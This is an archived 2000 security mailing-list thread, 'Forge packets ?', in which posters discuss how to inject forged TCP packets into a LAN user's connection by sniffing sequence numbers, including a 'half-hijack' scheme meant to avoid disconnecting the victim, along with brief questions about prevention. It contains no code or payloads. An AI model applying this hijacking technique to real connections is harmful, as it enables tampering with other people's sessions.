Vulnerability Development mailing list archives
Re: Forge packets ?
From: "Samy Kamkar [CommPort5]" <CommPort5 () LUCIDX COM>
Date: Tue, 12 Sep 2000 23:27:26 +0100
That sounds right, but as originally asked, can we send some data without disrupting anything...let's think about this situation. We're assuming that the remote host will take packets with incorrect sequence numbers, etc and throw them away (I doubt there's much else it would want to do with those packets.) See below and maybe you'll see how it can be done without disrupting anything: spoofed == us, local == the local user, remote == remote host... spoofed-local > remote: <data> (here is what you want sent, but now local is out of sync) spoofed-remote > local: <data> (this is just here to get local to synchronize with our 'half-hijack'...we hope this will trigger local to send some stuff back to 'remote' and synchronize like that) local > remote: ack/<data> (this is discarded at remote since remote already got it's data) remote > local: ack So here you (being the spoofed packets) send some data to the remote host and send some data to the local user. Assuming you put in some data (of course this isn't always possible, but should be able to be done) that gets local to send ack or data to remote [it will have an incorrect sequence number now], remote will ignore it since it doesn't belong anywhere. Remote will also send an ack back saying 'I heard your packet [the spoofed one]' so local sees everything normally and so does remote. Probably difficult but it should be able to be done George Gales wrote:
Hijacking normally involves knocking the original local user off the
net one
way or another. I don't believe there's a way to hijack without
causing a
disconnect without doing that. Assuming the hijacker was able to impersonate the local user (monitor
their
traffic, then inject spoofed packets with the right sequence numbers),
the
original user would still get disconnected. The cause is that, while the hijacker is sniffing the net to monitor
the
local user's traffic (and adjusting it's sequence numbers to make
things
work), the original local user isn't sniffing, and won't adjust his
sequence
numbers to take into account the hijackers traffic. As soon as the original local user communicates with the remote end
(either
direction), the receiving end would notice the incorrect sequence
numbers,
and things would go down the tubes (probably generate a RST and close
the
connection). If I'm wrong, please somebody explain... -Simon george_gales () non agilent com -----Original Message----- From: Samy Kamkar [CommPort5] [mailto:CommPort5 () LUCIDX COM] Sent: Monday, September 11, 2000 4:29 PM To: VULN-DEV () SECURITYFOCUS COM Subject: Re: Forge packets ? Just sending packets (assuming there is a connection from your lan
which
you're able to sniff) with data without disconnecting connections should be
pretty
simple. No handshakes needed since the connection will still be open
from
the local user...the local user will see it if (s)he sniffs the lan's
packets
and the remote host may echo the data which you sent, depending on the
protocol.
You would need to sniff the packets which the local user is sending to
the
remote host and then you'll need to create a packet matching what an outgoing packet from the local user would look like (correct sequence number,
window
size, etc.) and send it on it's way...so it is possible. There are
also
many programs which already 'utilize' the local-net/tcp insecuritys. Not allowing spoofed packets out (although it won't necesarilly always be
'spoofed',
could be from the same hostname depending on how the lan is set up) could
stop
it...I'm not aware of the best way to stop this from happening, or how
easy
it is to not allow spoofed packets out. Skreel wrote:So TCP hijacking is the solution ? I thought hunt could only hijack connections on port 23. What I actually want is to send data to remote host without
dropping the user's connection, wether the user's sees the data or not (i'm onlytalkingtheoritically) i just wanted to know if it was possible. And also if I used
ipchains to
IPmasquerade the lan, then wouldn't it be easier for an attacker to send data and
hijackthe user's connection ? Is there anyway to prevent this kind of attack (if it
is a
realattack )?
Current thread:
- Forge packets ? Skreel (Sep 12)
- Re: Forge packets ? Samy Kamkar [CommPort5] (Sep 12)
- Re: Forge packets ? FX, Phenoelit (Sep 21)
- <Possible follow-ups>
- Re: Forge packets ? Skreel (Sep 12)
- Re: Forge packets ? Samy Kamkar [CommPort5] (Sep 12)
- Re: Forge packets ? Michael Wojcik (Sep 12)
- Re: Forge packets ? George Gales (Sep 12)
- Re: Forge packets ? Everhart, Glenn (FUSA) (Sep 12)
- Re: Forge packets ? Samy Kamkar [CommPort5] (Sep 13)
- Re: Forge packets ? Andrew Thomas (Sep 13)
- Re: Forge packets ? Michael Wojcik (Sep 14)